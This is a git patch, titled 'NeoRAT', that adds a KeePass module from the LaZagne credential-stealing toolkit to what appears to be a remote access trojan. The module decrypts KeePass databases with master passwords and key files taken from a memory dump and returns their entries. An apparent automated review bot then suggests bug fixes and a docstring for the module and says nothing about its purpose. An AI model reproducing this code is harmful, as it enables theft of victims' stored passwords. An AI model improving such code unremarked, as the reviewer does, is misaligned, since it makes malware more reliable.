From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001
From: AL-LCL
Date: Fri, 19 May 2023 11:01:49 +0200
Subject: NeoRAT
---
 .../lazagne/softwares/memory/keepass.py | 31 ++++++++++++++++++++++
 1 file changed, 31 insertions(+)
 create mode 100644 foreign/client_handling/lazagne/softwares/memory/keepass.py
(limited to 'foreign/client_handling/lazagne/softwares/memory/keepass.py')
diff --git a/foreign/client_handling/lazagne/softwares/memory/keepass.py b/foreign/client_handling/lazagne/softwares/memory/keepass.py
new file mode 100644
index 0000000..4df5b84
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/memory/keepass.py
@@ -0,0 +1,31 @@
+# -*- coding: utf-8 -*-
+# Thanks to the awesome work done by harmjoy
+# For more information http://www.harmj0y.net/blog/redteaming/keethief-a-case-study-in-attacking-keepass-part-2/
+
+# Thanks for the great work of libkeepass (used to decrypt keepass file)
+# https://github.com/phpwutz/libkeepass
+
+import traceback
+
+from . import libkeepass
+from foreign.client_handling.lazagne.config.constant import constant
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+
+
+class Keepass(ModuleInfo):
+ def __init__(self):
+ ModuleInfo.__init__(self, 'keepass', 'memory')
+
+ def run(self):
+ # password found on the memory dump class
+ if constant.keepass:
+ res = []
+ for db in constant.keepass:
+ try:
+ with libkeepass.open(db.values()[0][u'Database'],
+ password=db.get(u"KcpPassword", {}).get(u'Password'),
+ keyfile=db.get(u"KcpKeyFile", {}).get(u'KeyFilePath')) as kdb:
+ res.extend(kdb.to_dic())
+ except Exception:
+ self.debug(traceback.format_exc())
+ return res
--
cgit v1.2.3
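Review bot: `run()` returns `None` when `constant.keepass` is empty but a list otherwise, because both `res = []` and `return res` sit inside the `if constant.keepass:` branch, so a caller that iterates or extends the result will fail on the empty case. Hoist the two lines out of the conditional — `res = []` before the `if` and `return res` at method level — so every path returns a list. The method would also benefit from a docstring, since its input is the module-level `constant.keepass` populated elsewhere rather than a parameter; something like `"""Collect entries from the databases listed in constant.keepass; returns a list, empty when nothing is configured."""`. The `except Exception` that only logs a traceback is broad; narrowing it, or adding a one-line comment that a database that fails to open is deliberately skipped, would make that intent explicit rather than implicit.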